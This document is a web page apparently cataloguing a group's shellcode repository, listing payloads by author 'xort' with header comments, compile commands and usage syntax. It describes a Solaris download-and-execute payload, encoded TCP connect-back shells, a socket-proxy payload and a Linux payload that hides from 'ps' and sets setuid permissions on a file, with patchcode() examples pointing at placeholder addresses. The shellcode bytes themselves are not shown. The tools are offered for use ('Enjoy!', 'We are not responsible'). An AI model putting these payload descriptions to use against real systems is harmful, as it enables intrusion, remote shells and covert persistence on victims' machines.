"Never let school get in the way of learning."
-- Mark Twain
Here you will find Black Security's shellcode repository
Solaris HTTP Download + Execute Shellcode
Now you can download exec a solaris stage2 with this nice payload from xort. Enjoy!
black-dl-exec-SOLARIS.c (MIPS) [278:bytes]
Dowloads a binary from host given named 'evil-dl' to '/tmp/ff' then executes.
11.21.6 Russell Sanford (xort@blacksecurity.org)
gcc -lnsl black-dl-exec-SOLARIS.c -o bdes
Solaris Session Encoded TCP Connect-back Shell with Client
black-RXenc-con-back-SOLARIS.c (MIPS)
This is a relitivly small (600 byte) shellcode that encodes all network trafic
between the
exploited process and the attacker. All clear-text shell i/o is encoded using a simple NOT
algo before being transmitted on the wire.
7.21.6 Russell Sanford (xort@blacksecurity.org)
linux/x86 examples of long-term payloads hide-wait-change
#=============================================================================================#
# hide-wait-change (final v4) #
# ------------------------------------------------------------------------------------------- #
# Author: xort (xort@blacksecurity.org) #
# Date: 09/14/2005 3:35pm #
# Type: shellcode/(x86-linux).s, (at&t) #
# Size: strlen(fake-proc-name) strlen(file-to-change) 187 #
# Discription: This is a shellcode that will infect a process, play some argv[0] games among #
# other tricks to hide itself from 'ps', and waits until the creation of a #
# specified file. Once this file is found to exist, its permissions are changed #
# to 04555. Original concept concived by izik. #
###############################################################################################
linux/x86 socket-proxy shellcode 372 bytes
/*---------------------------------------------------------------------------*
* 372 byte socket-proxy shellcode *
* by Russell Sanford - xort@blacksecurity.org *
*---------------------------------------------------------------------------*
* filename: x86-linux-bounce-proxy.c *
* date: 12/23/2005 *
* info: Compiled with DTP Project. *
* discription: This is a x86-linux proxy shellcode. This is probably best *
* used in stage 2 situations. The syntax for invoking the *
* patchcode is as follows: *
* *
* patchcode(shellcode,31337,"11.22.33.44",80); *
* *
* Where 31337 is the port to listen to on the remote host *
*---------------------------------------------------------------------------*/
Linux/x86 Connect Back shellcode 90 bytes
/*---------------------------------------------------------------------------*
* 90 byte Connect Back shellcode *
* by Russell Sanford - xort@blacksecurity.org *
*---------------------------------------------------------------------------*
* filename: x86-linux-connect-back.c *
* info: Compiled with DTP Project. *
* discription: This is a x86-linux connect back shellcode. Just invoke *
* the function patchcode() before using shellcode. The format *
* for invoking patchcode is as follows: *
* *
* patchcode(shellcode,"11.22.33.44",31337); *
*---------------------------------------------------------------------------*/
XOR-Encoded Remote Connect Back Shellcode
XOR-Encoded Remote Connect Back Shellcode written by XORt. This
includes a c-client as well as the shellcode connect-back server
agent. We are not responsible for what this code may cause.